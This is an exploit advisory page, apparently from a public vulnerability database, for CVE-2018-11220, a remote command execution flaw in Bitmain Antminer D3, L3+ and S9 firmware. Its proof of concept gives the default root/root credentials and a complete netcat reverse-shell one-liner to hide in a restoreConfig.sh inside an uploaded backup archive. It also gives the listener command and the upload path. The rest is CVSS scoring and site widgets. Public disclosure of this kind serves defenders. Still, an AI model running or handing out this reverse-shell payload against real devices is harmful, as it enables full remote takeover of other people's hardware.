Bitmain Antminer D3/L3+/S9 Remote Command Execution

2018.05.28
Credit: CorryL
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution # Google Dork: N/A # Date: 27/05/2018 # Exploit Author: Corrado Liotta # Vendor Homepage: https://www.bitmain.com/ # Software Link: N/A # Version: Antminer - D3, L3+, S9, and other # Tested on: Windows/Linux # CVE : CVE-2018-11220 #Description The software used by the miners produced by the bitmain (AntMiner) is affected by a vulnerability of remote code execution type, it is possible through the "Retore Backup" functionality of the administration portal to execute commands on the system. This would allow a malicious user with valid credentials to access the entire file system with administrative privileges. #POC Login on Antminer Configuration Portal (Default Credential: root/root) 1) Create a file named: restoreConfig.sh 2) insert inside: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f 3) Generate archive by inserting the file created before: Exploit.tar 4) Launch net cat and upload file: nc -vv -l -p port system --> upgrade --> upload archive


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top